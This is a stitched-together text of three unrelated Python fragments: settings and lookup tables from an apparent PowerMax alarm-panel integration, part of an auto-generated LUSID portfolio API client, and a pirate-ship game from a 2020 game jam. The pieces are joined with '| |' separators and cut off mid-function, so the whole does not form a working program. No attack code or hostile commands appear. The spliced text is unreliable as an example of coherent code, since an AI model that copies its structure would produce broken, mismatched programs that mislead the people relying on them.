"panelSoftware" : SettingsCommand( True, 1, "STRING", 144, 0x410, 144, 0, -1, "Panel Software", {} )
}
# { count:31, name:"", type:"STRING", size:0x80, poff:0x1900, psize:0x80, pstep:0x10 }
pmPanelName_t = {
"0000" : "PowerMax", "0001" : "PowerMax LT", "0004" : "PowerMax A", "0005" : "PowerMax", "0006" : "PowerMax LT",
"0009" : "PowerMax B", "000a" : "PowerMax A", "000b" : "PowerMax", "000c" : "PowerMax LT", "000f" : "PowerMax B",
"0014" : "PowerMax A", "0015" : "PowerMax", "0016" : "PowerMax", "0017" : "PowerArt", "0018" : "PowerMax SC",
"0019" : "PowerMax SK", "001a" : "PowerMax SV", "001b" : "PowerMax T", "001e" : "PowerMax WSS", "001f" : "PowerMax Smith",
"0100" : "PowerMax+", "0103" : "PowerMax+ UK (3)", "0104" : "PowerMax+ JP", "0106" : "PowerMax+ CTA", "0108" : "PowerMax+",
"010a" : "PowerMax+ SH", "010b" : "PowerMax+ CF", "0112" : "PowerMax+ WSS", "0113" : "PowerMax+ 2INST",
"0114" : "PowerMax+ HL", "0115" : "PowerMax+ UK", "0116" : "PowerMax+ 2INST3", "0118" : "PowerMax+ CF",
"0119" : "PowerMax+ 2INST", "011a" : "PowerMax+", "011c" : "PowerMax+ WSS", "011d" : "PowerMax+ UK",
"0120" : "PowerMax+ 2INST33", "0121" : "PowerMax+", "0122" : "PowerMax+ CF", "0124" : "PowerMax+ UK",
"0127" : "PowerMax+ 2INST_MONITOR", "0128" : "PowerMax+ KeyOnOff", "0129" : "PowerMax+ 2INST_MONITOR",
"012a" : "PowerMax+ 2INST_MONITOR42", "012b" : "PowerMax+ 2INST33", "012c" : "PowerMax+ One Inst_1_44_0",
"012d" : "PowerMax+ CF_1_45_0", "012e" : "PowerMax+ SA_1_46", "012f" : "PowerMax+ UK_1_47", "0130" : "PowerMax+ SA UK_1_48",
"0132" : "PowerMax+ KeyOnOff 1_50", "0201" : "PowerMax Pro", "0202" : "PowerMax Pro-Nuon ",
"0204" : "PowerMax Pro-PortugalTelecom", "020a" : "PowerMax Pro-PortugalTelecom2", "020c" : "PowerMax HW-V9 Pro",
"020d" : "PowerMax ProSms", "0214" : "PowerMax Pro-PortugalTelecom_4_5_02", "0216" : "PowerMax HW-V9_4_5_02 Pro",
"0217" : "PowerMax ProSms_4_5_02", "0218" : "PowerMax UK_DD243_4_5_02 Pro M", "021b" : "PowerMax Pro-Part2__2_27",
"0223" : "PowerMax Pro Bell-Canada", "0301" : "PowerMax Complete", "0302" : "PowerMax Complete_NV",
"0303" : "PowerMax Complete-PortugalTelecom", "0307" : "PowerMax Complete_1_0_07", "0308" : "PowerMax Complete_NV_1_0_07",
"030a" : "PowerMax Complete_UK_DD243_1_1_03", "030b" : "PowerMax Complete_COUNTERFORCE_1_0_06", "0401" : "PowerMax Pro-Part",
"0402" : "PowerMax Pro-Part CellAdaptor", "0405" : "PowerMax Pro-Part_5_0_08", "0406" : "PowerMax Pro-Part CellAdaptor_5_2_04",
"0407" : "PowerMax Pro-Part KeyOnOff_5_0_08", "0408" : "PowerMax UK Pro-Part_5_0_08",
"0409" : "PowerMax SectorUK Pro-Part_5_0_08", "040a" : "PowerMax Pro-Part CP1 4_10", "040c" : "PowerMax Pro-Part_Cell_key_4_12",
"040d" : "PowerMax Pro-Part UK 4_13", "040e" : "PowerMax SectorUK Pro-Part_4_14", "040f" : "PowerMax Pro-Part UK 4_15",
"0410" : "PowerMax Pro-Part CP1 4_16", "0411" : "PowerMax NUON key 4_17", "0433" : "PowerMax Pro-Part2__4_51",
"0434" : "PowerMax UK Pro-Part2__4_52", "0436" : "PowerMax Pro-Part2__4_54", "0437" : "PowerMax Pro-Part2__4_55 (CP_01)",
"0438" : "PowerMax Pro-Part2__4_56", "0439" : "PowerMax Pro-Part2__4_57 (NUON)", "043a" : "PowerMax Pro 4_58",
"043c" : "PowerMax Pro 4_60", "043e" : "PowerMax Pro-Part2__4_62", "0440" : "PowerMax Pro-Part2__4_64",
"0442" : "PowerMax 4_66", "0443" : "PowerMax Pro 4_67", "0444" : "PowerMax Pro 4_68", "0445" : "PowerMax Pro 4_69",
"0446" : "PowerMax Pro-Part2__4_70", "0447" : "PowerMax 4_71", "0449" : "PowerMax 4_73", "044b" : "PowerMax Pro-Part2__4_75",
"0451" : "PowerMax Pro 4_81", "0452" : "PowerMax Pro 4_82", "0454" : "PowerMax 4_84", "0455" : "PowerMax 4_85",
"0456" : "PowerMax 4_86", "0503" : "PowerMax UK Complete partition 1_5_00", "050a" : "PowerMax Complete partition GPRS",
"050b" : "PowerMax Complete partition NV GPRS", "050c" : "PowerMax Complete partition GPRS NO-BBA",
"050d" : "PowerMax Complete partition NV GPRS NO-BBA", "050e" : "PowerMax Complete part. GPRS NO-BBA UK_5_14",
"0511" : "PowerMax Pro-Part CP1 GPRS 5_17", "0512" : "PowerMax Complete part. BBA UK_5_18",
"0533" : "PowerMax Complete part2 5_51", "0534" : "PowerMax Complete part2 5_52 (UK)",
"0536" : "PowerMax Complete 5_54 (GR)", "0537" : "PowerMax Complete 5_55", "053a" : "PowerMax Complete 5_58 (PT)",
"053b" : "PowerMax Complete part2 5_59 (NV)", "053c" : "PowerMax Complete 5_60", "053e" : "PowerMax Complete 5_62",
"053f" : "PowerMax Complete part2 5_63", "0540" : "PowerMax Complete 5_64", "0541" : "PowerMax Complete 5_65",
"0543" : "PowerMax Complete 5_67", "0544" : "PowerMax Complete 5_68", "0545" : "PowerMax Complete 5_69",
"0546" : "PowerMax Complete 5_70", "0547" : "PowerMax Complete 5_71", "0549" : "PowerMax Complete 5_73",
"054b" : "PowerMax Complete 5_75", "054f" : "PowerMax Complete 5_79", "0601" : "PowerMax Express",
"0603" : "PowerMax Express CP 01", "0605" : "PowerMax Express OEM 6_5", "0607" : "PowerMax Express BBA 6_7",
"0608" : "PowerMax Express CP 01 BBA 6_8", "0609" : "PowerMax Express OEM1 BBA 6_9", "060b" : "PowerMax Express BBA 6_11",
"0633" : "PowerMax Express 6_51", "063b" : "PowerMax Express 6_59", "063d" : "PowerMax Express 6_61",
"063e" : "PowerMax Express 6_62 (UK)", "0645" : "PowerMax Express 6_69", "0647" : "PowerMax Express 6_71",
"0648" : "PowerMax Express 6_72", "0649" : "PowerMax Express 6_73", "064a" : "PowerMax Activa 6_74",
"064c" : "PowerMax Express 6_76", "064d" : "PowerMax Express 6_77", "064e" : "PowerMax Express 6_78",
"064f" : "PowerMax Secure 6_79", "0650" : "PowerMax Express 6_80", "0650" : "PowerMax Express part2 M 6_80",
"0651" : "PowerMax Express 6_81", "0652" : "PowerMax Express 6_82", "0653" : "PowerMax Express 6_83",
"0654" : "PowerMax 6_84", "0655" : "PowerMax 6_85", "0658" : "PowerMax 6_88", "0659" : "PowerMax 6_89",
"065a" : "PowerMax 6_90", "065b" : "PowerMax 6_91", "0701" : "PowerMax PowerCode-G 7_1", "0702" : "PowerMax PowerCode-G 7_2",
"0704" : "PowerMaster10 7_4", "0705" : "PowerMaster10 7_05", "0707" : "PowerMaster10 7_07", "070c" : "PowerMaster10 7_12",
"070f" : "PowerMaster10 7_15", "0710" : "PowerMaster10 7_16", "0711" : "PowerMaster10 7_17", "0712" : "PowerMaster10 7_18",
"0713" : "PowerMaster10 7_19", "0802" : "PowerMax Complete PowerCode-G 8_2", "0803" : "PowerMaster30 8_3",
"080f" : "PowerMaster30 8_15", "0810" : "PowerMaster30 8_16", "0812" : "PowerMaster30 8_18", "0813" : "PowerMaster30 8_19",
"0815" : "PowerMaster30 8_21"
}
pmZoneType_t = {
"EN" : (
"Non-Alarm", "Emergency", "Flood", "Gas", "Delay 1", "Delay 2", "Interior-Follow", "Perimeter", "Perimeter-Follow",
"24 Hours Silent", "24 Hours Audible", "Fire", "Interior", "Home Delay", "Temperature", "Outdoor", "16" ),
"NL" : (
"Geen alarm", "Noodtoestand", "Water", "Gas", "Vertraagd 1", "Vertraagd 2", "Interieur volg", "Omtrek", "Omtrek volg",
"24 uurs stil", "24 uurs luid", "Brand", "Interieur", "Thuis vertraagd", "Temperatuur", "Buiten", "16" )
} # "Arming Key", "Guard" ??
# Zone names are taken from the panel, so no langauage support needed
pmZoneName_t = (
"Attic", "Back door", "Basement", "Bathroom", "Bedroom", "Child room", "Conservatory", "Play room", "Dining room", "Downstairs",
"Emergency", "Fire", "Front door", "Garage", "Garage door", "Guest room", "Hall", "Kitchen", "Laundry room", "Living room",
"Master bathroom", "Master bedroom", "Office", "Upstairs", "Utility room", "Yard", "Custom 1", "Custom 2", "Custom 3",
"Custom4", "Custom 5", "Not Installed"
)
pmZoneChime_t = {
"EN" : ("Off", "Melody", "Zone", "Invalid"),
"NL" : ("Uit", "Muziek", "Zone", "Invalid")
}
# Note: names need to match to VAR_xxx
pmZoneSensor_t = {
0x3 : "Motion", 0x4 : "Motion", 0x5 : "Magnet", 0x6 : "Magnet", 0x7 : "Magnet", 0xA : "Smoke", 0xB : "Gas", 0xC : "Motion", 0xF : "Wired"
} # unknown to date: Push Button, Flood, Universal
ZoneSensorMaster = collections.namedtuple("ZoneSensorMaster", 'name func' )
pmZoneSensorMaster_t = {
0x01 : ZoneSensorMaster("Next PG2", "Motion" ),
0x04 : ZoneSensorMaster("Next CAM PG2", "Camera" ),
0x16 : ZoneSensorMaster("SMD-426 PG2", "Smoke" ),
0x1A : ZoneSensorMaster("TMD-560 PG2", "Temperature" ),
0x2A : ZoneSensorMaster("MC-302 PG2", "Magnet"),
0xFE : ZoneSensorMaster("Wired", "Wired" )
}
class ElapsedFormatter():
def __init__(self):
self.start_time = time.time()
def format(self, record):
elapsed_seconds = record.created - self.start_time
#using timedelta here for convenient default formatting
elapsed = timedelta(seconds = elapsed_seconds)
return "{} <{: >5}> {: >8} {}".format(elapsed, | |
True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object, the HTTP status code, and the headers.
If the method is called asynchronously,
returns the request thread.
:rtype: (DeletedEntityResponse, int, HTTPHeaderDict)
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'property_keys',
'effective_at'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_portfolio_properties" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'property_keys' is set
if self.api_client.client_side_validation and ('property_keys' not in local_var_params or # noqa: E501
local_var_params['property_keys'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `property_keys` when calling `delete_portfolio_properties`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None: # noqa: E501
query_params.append(('effectiveAt', local_var_params['effective_at'])) # noqa: E501
if 'property_keys' in local_var_params and local_var_params['property_keys'] is not None: # noqa: E501
query_params.append(('propertyKeys', local_var_params['property_keys'])) # noqa: E501
collection_formats['propertyKeys'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3923'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "DeletedEntityResponse",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/properties', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def delete_portfolio_returns(self, scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs): # noqa: E501
"""[EARLY ACCESS] DeletePortfolioReturns: Delete Returns # noqa: E501
Cancel one or more Returns which exist into the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_portfolio_returns(scope, code, return_scope, return_code, from_effective_at, to_effective_at, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param from_effective_at: The start date from which to delete the Returns. (required)
:type from_effective_at: str
:param to_effective_at: The end date from which to delete the Returns. (required)
:type to_effective_at: str
:param period: The Period (Daily or Monthly) of the Returns to be deleted. Defaults to Daily.
:type period: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: DeletedEntityResponse
"""
kwargs['_return_http_data_only'] = True
return self.delete_portfolio_returns_with_http_info(scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs) # noqa: E501
def delete_portfolio_returns_with_http_info(self, scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs): # noqa: E501
"""[EARLY ACCESS] DeletePortfolioReturns: Delete Returns # noqa: E501
Cancel one or more Returns which exist into the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_portfolio_returns_with_http_info(scope, code, return_scope, return_code, from_effective_at, to_effective_at, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param from_effective_at: The start date from which to delete the Returns. (required)
:type from_effective_at: str
:param to_effective_at: The end date from which to delete the Returns. (required)
:type to_effective_at: str
:param period: The Period (Daily or Monthly) of the Returns to be deleted. Defaults to Daily.
:type period: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object, the HTTP status code, and the headers.
If the method is called asynchronously,
returns the request thread.
:rtype: (DeletedEntityResponse, int, HTTPHeaderDict)
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'return_scope',
'return_code',
'from_effective_at',
'to_effective_at',
'period'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_portfolio_returns" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'from_effective_at' is set
if self.api_client.client_side_validation and ('from_effective_at' not in local_var_params or # noqa: E501
local_var_params['from_effective_at'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `from_effective_at` when calling `delete_portfolio_returns`") # noqa: E501
# verify the required parameter 'to_effective_at' is set
if self.api_client.client_side_validation and ('to_effective_at' not in local_var_params or # noqa: E501
local_var_params['to_effective_at'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `to_effective_at` when calling `delete_portfolio_returns`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_returns`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_returns`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and | |
"""
<NAME>
Domicidal
Python Discord | Game Jam 2020
"""
# Standard Library
from math import atan2, degrees, radians, sin, cos, sqrt
import os
from pathlib import Path
import random
import time
# Third Party
import arcade
import PIL
from pyglet import gl
# Local
from game.utils import pathfinding
UPDATES_PER_FRAME = 3
PLAYER_MOVEMENT_SPEED = 150
SHIP_MOVEMENT_SPEED = 200
CANNONBALL_SPEED = 20
# How many pixels to keep as a minimum margin between the character
# and the edge of the screen.
LEFT_VIEWPORT_MARGIN = 300
RIGHT_VIEWPORT_MARGIN = 300
BOTTOM_VIEWPORT_MARGIN = 50
TOP_VIEWPORT_MARGIN = 100
CHARACTER_SCALING = 0.5
SHIP_SCALING = 1
# Constants used to track if the player is facing left or right
RIGHT_FACING = 0
LEFT_FACING = 1
MUSIC_VOLUME = 0.2
SCREEN_WIDTH = 1280
SCREEN_HEIGHT = 720
SCREEN_TITLE = "Brawn, Brain, and Bald"
# File paths for project and resources
path = {}
path['project'] = Path(os.path.dirname(__file__))
path['resources'] = path['project'] / "resources"
path['img'] = path['resources'] / "img"
path['sound'] = path['resources'] / "sound"
path['maps'] = path['resources'] / "maps"
def load_texture_pair(filename):
'''
Load a texture pair, with the second being a mirror image.
'''
return [
arcade.load_texture(filename),
arcade.load_texture(filename, mirrored=True)
]
class Weapon(arcade.Sprite):
def __init__(self, sprite_root):
super().__init__()
sprite_path = path['img'] / sprite_root
self.scale = 1
self.texture_dict = {}
for i in os.listdir(sprite_path):
self.texture_dict[i] = []
for j in range(1, len(os.listdir(sprite_path / i))+1):
self.texture_dict[i].append(load_texture_pair(
sprite_path / i / f"({j}).png"))
self.texture = self.texture_dict['sword_stab'][0][0]
self.is_stab = False
self.is_cut = False
self.cur_stab_texture = 0
self.cur_cut_texture = 0
# print(self.texture_dict)
def update_animation(self):
# Attack animation
if self.is_stab:
frames = self.cur_stab_texture // UPDATES_PER_FRAME
if frames == len(self.texture_dict['sword_stab'])-1:
self.cur_stab_texture = 0
self.is_stab = False
return
self.texture = self.texture_dict['sword_stab'][frames][0]
self.cur_stab_texture += 1
if self.is_cut:
frames = self.cur_cut_texture // UPDATES_PER_FRAME
if frames == len(self.texture_dict['sword_cut'])-1:
self.cur_cut_texture = 0
self.is_cut = False
self.texture = self.texture_dict['sword_stab'][0][0]
return
self.texture = self.texture_dict['sword_cut'][frames][0]
self.cur_cut_texture += 1
class Ship(arcade.Sprite):
'''
Playable Pirate Ship
'''
def __init__(self, filename):
super().__init__(filename)
self.name = 'Ship'
self.health = 100
self.scale = SHIP_SCALING
for i in (50, 25, 0):
self.append_texture(
arcade.load_texture(
path['img'] / 'ship' / f'ship_{i}.png'))
class EnemyShip(arcade.Sprite):
'''
Enemy Ship
'''
def __init__(self, filename):
super().__init__(filename)
self.name = 'Ship'
self.health = 100
self.scale = SHIP_SCALING
self.speed = 20
self.SAIL_SPEED_FACTOR = 0.5
self.set_position(
random.randint(800, 2000), random.randint(400, 1000)
)
self.target = (self.center_x, self.center_y)
self.path_position = 1
self.path = []
self.cannonballs = arcade.SpriteList()
for i in (50, 25, 0):
self.append_texture(
arcade.load_texture(
path['img'] / 'enemy_ship' / f'ship_{i}.png'))
self.fire_port = False
self.fire_starboard = False
self.time_fired = 0
self.time_diff = 20
self.fire_rate = 3
self.collision_time = 0
self.collision_time_diff = 0
def move_to(self, delta_time):
self.change_x = 0
self.change_y = 0
# target = (x, y)
dx = self.target[0] - self.center_x
dy = self.target[1] - self.center_y
magnitude = sqrt(dx**2 + dy**2)+0.00001
self.angle = degrees(atan2(dy, dx)) % 360 + 90
self.change_y = self.speed*dy/magnitude*10
self.change_x = self.speed*dx/magnitude*10
# print(f"""MOVING:{dy, dx, self.angle, self.change_x, self.change_y}
# \n{self.path_position, self.path}""")
def fire_cannonball(self, *direction):
fire_direction = self.angle
if direction[0] == 'starboard':
fire_direction += 180
self.cannonball = arcade.Sprite(
path['img'] / 'ship' / 'cannonBall.png', 1)
start_x, start_y = self._get_position()
self.cannonball.set_position(start_x, start_y)
self.cannonball.change_x = cos(radians(
fire_direction)) * CANNONBALL_SPEED
self.cannonball.change_y = sin(radians(
fire_direction)) * CANNONBALL_SPEED
# print(self.angle % 360)
self.cannonballs.append(self.cannonball)
def kill_cannonball(self, cannonball):
max_height, max_width = 10000, 10000
if (cannonball.center_x < 0
or cannonball.center_y < 0
or cannonball._get_bottom() > max_height
or cannonball._get_left() > max_width):
cannonball.kill()
def on_update(self, delta_time):
self.move_to(delta_time)
self.center_x += self.change_x*self.SAIL_SPEED_FACTOR*delta_time
self.center_y += self.change_y*self.SAIL_SPEED_FACTOR*delta_time
self.time_diff = time.time() - self.time_fired
if self.time_diff >= self.fire_rate and self.health > 0:
if self.fire_port:
self.fire_cannonball('')
self.time_fired = time.time()
self.fire_port = False
if self.fire_starboard:
self.fire_cannonball('starboard')
self.time_fired = time.time()
self.fire_starboard = False
for cannonball in self.cannonballs:
cannonball.center_x += cannonball.change_x
cannonball.center_y += cannonball.change_y
self.kill_cannonball(cannonball)
if int(self.health) in range(25, 51):
self.set_texture(1)
self.change_y *= 0.5
self.change_x *= 0.5
elif int(self.health) in range(1, 25):
self.set_texture(2)
self.change_y *= 0.25
self.change_x *= 0.25
# Death condition
if int(self.health) <= 0:
self.set_texture(3)
self.SAIL_SPEED_FACTOR = 0
self.collision_time_diff = time.time() - self.collision_time
# print(self.center_x, self.center_y)
class Pirate(arcade.Sprite):
"""
Player class
"""
def __init__(self, sprite_root):
super().__init__()
self.name = sprite_root
self.scale = CHARACTER_SCALING
self.health = 100
sprite_path = path['img'] / sprite_root
self.texture_dict = {}
self.texture_dict['run'] = [
load_texture_pair(sprite_path / "run" / f"{i}.png")
for i in range(1, len(os.listdir(sprite_path / "run"))+1)
]
self.texture_dict['idle'] = [
load_texture_pair(sprite_path / "idle" / f"{i}.png")
for i in range(1, len(os.listdir(sprite_path / "idle"))+1)
]
self.texture_dict['attack'] = [
load_texture_pair(sprite_path / "attack" / f"{i}.png")
for i in range(1, len(os.listdir(sprite_path / "attack"))+1)
]
self.texture_dict['hit'] = [
load_texture_pair(sprite_path / "hit" / f"{i}.png")
for i in range(1, len(os.listdir(sprite_path / "hit"))+1)
]
self.texture_dict['death'] = [
load_texture_pair(sprite_path / "death" / f"{i}.png")
for i in range(1, len(os.listdir(sprite_path / "death"))+1)
]
self.texture = self.texture_dict['idle'][0][0]
self.bottom = 0
self.cur_run_texture = 0
self.cur_idle_texture = 0
self.cur_attack_texture = 0
self.cur_hit_texture = 0
self.cur_death_texture = 0
self.character_face_direction = RIGHT_FACING
self.is_idle = False
self.is_attacking = False
self.is_hit = False
self.follower = False
def update_animation(self):
# Figure out if we need to flip face left or right
if self.change_x < 0 and self.character_face_direction == RIGHT_FACING:
self.character_face_direction = LEFT_FACING
elif (
self.change_x > 0 and
self.character_face_direction == LEFT_FACING
):
self.character_face_direction = RIGHT_FACING
# TODO: Create single function for each animation instead of repeating
# all this code
# Idle animation
if self.health <= 0:
self.change_x, self.change_y = 0, 0
frames = self.cur_death_texture // UPDATES_PER_FRAME
if frames == len(self.texture_dict['death'])-1:
return
# print(self.name, frames)
self.texture = self.texture_dict['death'][frames][
self.character_face_direction
]
self.cur_death_texture += 1
return
elif self.is_idle:
frames = self.cur_idle_texture // UPDATES_PER_FRAME
if frames == len(self.texture_dict['idle'])-1:
self.cur_idle_texture = 0
# print(self.name, frames)
self.texture = self.texture_dict['idle'][frames][
self.character_face_direction
]
self.cur_idle_texture += 1
return
elif self.is_hit:
frames = self.cur_hit_texture // UPDATES_PER_FRAME
if frames == len(self.texture_dict['hit'])-1:
self.cur_hit_texture = 0
self.is_hit = False
return
# print(self.name, frames)
self.texture = self.texture_dict['hit'][frames][
self.character_face_direction
]
self.cur_hit_texture += 1
return
# Attack animation
elif self.is_attacking:
frames = self.cur_attack_texture // UPDATES_PER_FRAME
if frames == len(self.texture_dict['attack'])-1:
self.cur_attack_texture = 0
self.is_attacking = False
return
self.texture = self.texture_dict['attack'][frames][
self.character_face_direction
]
self.cur_attack_texture += 1
# Default animation
elif self.change_x == 0 and self.change_y == 0:
self.texture = self.texture_dict['idle'][0][
self.character_face_direction
]
(self.cur_run_texture, self.cur_idle_texture,
self.cur_attack_texture) = (0, 0, 0)
return
# Walking animation
else:
frames = self.cur_run_texture // UPDATES_PER_FRAME
if frames == len(self.texture_dict['run'])-1:
self.cur_run_texture = 0
self.texture = self.texture_dict['run'][frames][
self.character_face_direction
]
self.cur_run_texture += 1
def pathfinding(self, target):
pass
def on_update(self, delta_time):
self.update_animation()
self.center_x += self.change_x * delta_time
self.center_y += self.change_y * delta_time
class Enemy_SpriteSheet(arcade.Sprite):
def __init__(self, sprite_root):
super().__init__()
self.character_face_direction = LEFT_FACING
self.movement_speed = 10
self.health = 100
self.is_idle = False
self.is_hit = False
self.is_attacking = False
self.cur_idle_texture = 0
self.cur_attack_texture = 0
self.cur_run_texture = 0
self.cur_hit_texture = 0
self.cur_death_texture = 0
self.center_x, self.center_y = random.randint(300, 350), random.randint(450, 500)
self.path = []
self.path_position = 1
self.right_facing_textures = [
arcade.load_spritesheet(
path['img'] / sprite_root / f'{i}.png',
PIL.Image.open(
path['img'] / sprite_root / f'{i}.png').size[0]/j,
PIL.Image.open(
path['img'] / sprite_root / f'{i}.png').size[1],
j, j)
for (i, j) in zip(
('attack', 'death', 'hurt', 'idle', 'walk'),
(20, 13, 16, 18, 20))
]
self.left_facing_textures = []
for animation in self.right_facing_textures:
textures_list = []
for texture in animation:
textures_list.append(
arcade.Texture(
f'{texture.name}_mirrored',
PIL.ImageOps.mirror(texture.image)
))
self.left_facing_textures.append(textures_list)
self.texture_dict = {}
for (i, j) in zip(
('attack', 'death', 'hurt', 'idle', 'walk'),
(0, 1, 2, 3, 4)
):
self.texture_dict[i] = [
self.right_facing_textures[j], self.left_facing_textures[j]
]
self.texture = self.left_facing_textures[0][0]
self.target = (self.center_x, self.center_y)
def enemy_pathfinding(self, matrix, target, delta_time):
if len(self.path)-1 < self.path_position:
self.path_position = 1
self.path = pathfinding.find_path(
matrix,
self.center_x, self.center_y,
target.center_x, target.center_y,
16, 36
)
# print(self.path, self.path_position)
if len(self.path) > 2:
path_x, path_y = self.path[self.path_position]
if (
int(self.center_x) not in range(
path_x-2, path_x+2)and
int(self.center_y) not in range(
path_y-2, path_y+2)
):
# print(f"Moving to node {self.path_position}")
self.target = self.path[self.path_position]
else:
# print(f"At node {self.path_position}")
self.path_position += 1
else:
self.change_x, self.change_y = 0, 0
# self.character_face_direction = target.character_face_direction
self.path = pathfinding.find_path(
matrix,
self.center_x, self.center_y,
target.center_x, target.center_y,
16, 36
)
self.path_position = 1
def move_to(self, delta_time):
# target = (x, y)
dx = self.target[0] - self.center_x
dy = self.target[1] - self.center_y
magnitude = sqrt(dx**2 + dy**2)+0.00001
self.change_y = dy/magnitude*10
self.change_x = dx/magnitude*10
# print(f"""MOVING:{dy, dx, self.angle, self.change_x, self.change_y}
# \n{self.path_position, self.path}""")
def on_update(self, delta_time):
self.move_to(delta_time)
self.update_animation(delta_time)
self.center_x += self.change_x*delta_time*self.movement_speed
self.center_y += self.change_y*delta_time*self.movement_speed
self.change_x = 0
self.change_y = 0
def update_animation(self, delta_time):
# Figure out if we need to flip face left or right
